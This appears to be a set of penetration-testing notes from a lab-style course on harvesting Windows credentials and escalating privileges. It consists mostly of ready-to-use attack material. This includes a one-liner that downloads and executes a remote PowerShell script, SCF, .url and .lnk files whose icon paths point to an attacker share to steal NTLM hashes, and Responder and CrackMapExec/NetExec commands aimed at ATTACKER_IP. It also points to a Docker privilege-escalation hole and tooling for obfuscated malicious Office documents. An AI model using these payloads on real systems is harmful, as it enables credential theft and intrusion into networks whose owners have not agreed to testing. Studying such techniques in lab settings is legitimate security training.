Interacting with Users

Traffic Capture

How to Find Passwords Using WiresharkInstructables

Tools

GitHub - DanMcInerney/net-creds: Sniffs sensitive data from interface or pcapGitHub

net-creds

GitHub - lgandx/PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.GitHub

PCreds

GitHub - odedshimon/BruteShark: Network Analysis ToolGitHub

BruteShark

GitHub - ShellCode33/CredSLayer: Extract credentials and other useful info from network capturesGitHub

CredSLayer

NetworkMiner - The NSM and Network Forensics Analysis Tool ⛏Netresec

NetMiner - Free Version

GitHub - mlgualtieri/NTLMRawUnHide: NTLMRawUnhide.py is a Python3 script designed to parse network packet capture files and extract NTLMv2 hashes in a crackable format. The following binary network packet capture formats are supported: *.pcap *.pcapng *.cap *.etlGitHub

Monitoring for Process Command Lines

procmon.ps1

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

PS C:\htb> IEX (iwr 'http://10.10.10.205/procmon.ps1') 

InputObject                                           SideIndicator
-----------                                           -------------
@{CommandLine=C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}} =>      
@{CommandLine=“C:\Windows\system32\cmd.exe” }                          =>      
@{CommandLine=\??\C:\Windows\system32\conhost.exe 0x4}                      =>      
@{CommandLine=net use T: \\sql02\backups /user:inlanefreight\sqlsvc My4dm1nP@s5w0Rd}       =>       
@{CommandLine=“C:\Windows\system32\backgroundTaskHost.exe” -ServerName:CortanaUI.AppXy7vb4pc2... <=

Vulnerable Services

Docker Desktop Community Edition before 2.1.0.1.

Elevation of Privilege in Docker for WindowsMedium

The program looks for docker-credential-wincred.exe and docker-credential-wincred.bat files in the C:\PROGRAMDATA\DockerDesktop\version-bin\. This directory was misconfigured to allow full write access to the BUILTIN\Users group, meaning that any authenticated user on the system could write a file into it (such as a malicious executable).

Any executable placed in that directory would run when a) the Docker application starts and b) when a user authenticates using the command docker login.

SCF on a File Share

@Inventory.scf

[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop

sudo responder -wrf -v -I tun0

ntlm_theft

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

Using SCFs no longer works on Server 2019 hosts, but we can achieve the same effect using a malicious .lnk file.

CME

crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP
crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=ATTACKER_IP

Rocabella

GitHub - nickvourd/Rocabella: Sniffing files generatorGitHub

LNK File on a File Share

lnkdomb

GitHub - dievus/lnkbomb: Malicious shortcut generator for collecting NTLM hashes from insecure file shares.GitHub

Generating a Malicious .lnk File

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Netexec

NTLM Relaying - Making the Old New Again | JUMPSEC LABSJUMPSEC LABS

nxc smb IP -u username -p password -d domain.local -M slinky -o NAME=Shortcut SERVER=ATTACKER_IP

Rocabella

GitHub - nickvourd/Rocabella: Sniffing files generatorGitHub

URL Files on a File Share

This attack also works with .url files and responder -I eth0 -v

[InternetShortcut] 
URL=whatever 
WorkingDirectory=whatever 
IconFile=\10.10.10.10%USERNAME%.icon 
IconIndex=1

Obfuscated Files

Word, ppt, scf, lnk, etc

GitHub - sevagas/macro_pack: macro_pack is a tool by @EmericNasi used to automatize obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for pentest, demo, and social engineering assessments. The goal of macro_pack is to simplify exploitation, antimalware bypass, and automatize the process from malicious macro and script generation to final document generation. It also provides a lot of helpful features useful for redteam or security research.GitHub